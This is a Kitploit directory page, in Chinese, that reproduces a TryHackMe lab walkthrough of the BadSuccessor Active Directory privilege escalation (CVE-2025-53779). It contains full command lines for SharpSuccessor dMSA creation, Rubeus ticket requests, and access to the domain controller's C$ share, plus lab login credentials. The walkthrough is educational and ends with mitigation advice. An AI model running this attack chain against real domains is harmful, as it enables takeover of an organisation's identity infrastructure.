Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Active-Directory-BadSuccessor — 一个涵盖使用 Windows 进行 CVE-2025-53779 漏洞利用的 TryHackme 房间 | Kitploit
工具/GitHubGitHub/musa-xvi/active-directory-badsuccessor
权限提升侦察漏洞利用后渗透利用CTF渗透测试身份验证学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
musa-xvi/active-directory-badsuccessor

Active-Directory-BadSuccessor

一个涵盖使用 Windows 进行 CVE-2025-53779 漏洞利用的 TryHackme 房间

查看仓库
23个月前尚未审核

Active-Directory-BadSuccessor

概述

在本房间中,我们探讨 BadSuccessor 权限提升技术,这是一种滥用 Active Directory 中委托托管服务帐户(dMSA)的漏洞。该攻击允许对 dMSA 对象具有足够控制权的用户模拟另一个帐户,并有可能获得域管理员权限。

房间信息

房间: https://tryhackme.com/room/adbadsuccessor

难度: 中等

日期: 05/06/2026

版本: 1.0

目标: 演示如何滥用委托托管服务帐户来提升权限并入侵 Active Directory 环境。

角色: Terry Byte (tbyte)

目标: 评估新部署的 Active Directory 环境的安全性,并确定其是否易受 BadSuccessor 攻击。

攻击路径

该攻击由两个主要阶段组成:

  1. 侦察。
  2. 通过 dMSA 滥用进行权限提升

侦察

步骤 1 - 连接到目标机器

  • 使用 RDP 连接到提供的 Windows 工作站:
root@kitploit:~
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
  • 身份验证后,打开 PowerShell。

步骤 2 - 导航到工作目录

  • 移动到概念验证目录:

    root@kitploit:~
    cd C:\PoC
    
  • 验证内容:dir

navigate_directory

步骤 3 - 获取枚举脚本

  • 从 Akamai 的 BadSuccessor 仓库下载 PowerShell 脚本:
root@kitploit:~
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
  • 使用记事本创建或编辑脚本:

notepad Get-BadSuccessorOUPermissions.ps1

  • 粘贴内容并保存文件。
edit_script

步骤 4 - 枚举 OU 权限

  • 执行脚本:
root@kitploit:~
 .\Get-BadSuccessorOUPermissions.ps1
enumerate_script
  • 输出揭示了具有可能滥用委托托管服务帐户权限的帐户。
  • 识别脚本返回的第三个帐户。
  • 该帐户将在权限提升阶段使用。

使用 Windows 进行利用

步骤 1 - 创建恶意 dMSA

  • 使用 SharpSuccessor 创建一个模拟 Administrator 帐户的委托托管服务帐户:

    root@kitploit:~
    .\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
    
    malicious_dMSA

会发生什么?

  • 该工具创建一个新的 dMSA 对象,并将其配置为继承 Administrator 帐户。
  • 这为权限提升奠定了基础。

步骤 2 - 请求 Kerberos TGT

  • 使用 Rubeus 获取委托票据授予票据(TGT):

    root@kitploit:~
    .\Rubeus.exe tgtdeleg /nowrap
    
    Kerberos TGT
  • 该命令返回一个 Base64 编码的 Kerberos 票据。

  • 复制生成的票据。

步骤 3 - 模拟 dMSA 帐户

  • 使用委托 TGT 以新创建的 dMSA 帐户身份请求票据:
root@kitploit:~
 .\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
dMSA_Account

结果:

一个新的 Kerberos 票据被注入到内存中,用于该 dMSA 帐户。

步骤 4 - 以 Administrator 身份请求服务票据

  • 利用 dMSA 票据获取对在 Administrator 上下文下运行的服务的访问权限:

    root@kitploit:~
    .\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
    
    Admin-ticket

结果:

  • CIFS 服务票据被加载到内存中。
  • 该票据提供对通常需要域管理员权限的资源的访问。

步骤 5 - 访问 Administrator 桌面

  • 通过在域控制器上浏览 Administrator 配置文件来验证提升的访问权限:
root@kitploit:~
 dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
malicious_dMSA
  • 成功的目录列表确认了管理员级别的访问权限。

步骤 6 - 获取 Flag

  • 读取存储在 Administrator 桌面上的 flag:

    root@kitploit:~
    Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
    
    Flag
  • 成功获取 Flag。

为什么 BadSuccessor 很重要

BadSuccessor 演示了委托托管服务帐户如何在 Active Directory 环境中引入权限提升路径。Active Directory 是许多组织的身份骨干,影响 Kerberos 和帐户委派的漏洞可能造成严重后果。

对 dMSA 对象拥有足够权限的攻击者可以:

  • 模拟特权用户
  • 获取提升权限的 Kerberos 票据
  • 访问敏感资源
  • 将权限提升至域管理员
  • 可能危及整个 Active Directory 林

缓解建议

为缓解 BadSuccessor(CVE-2025-53779),组织应及时应用 Microsoft 的安全更新,限制并审查 dMSA 权限,监控可疑的 Kerberos 活动,审计委派关系,并遵循最小权限原则。定期审查 Active Directory 委派设置有助于识别并减少潜在的权限提升路径。

关键要点

本房间提供了以下方面的宝贵实操经验:

  • Active Directory 权限提升
  • 委托托管服务帐户(dMSA)
  • Kerberos 认证滥用
  • Rubeus 票据操作
  • SharpSuccessor 利用
  • 后渗透验证技术
下载工具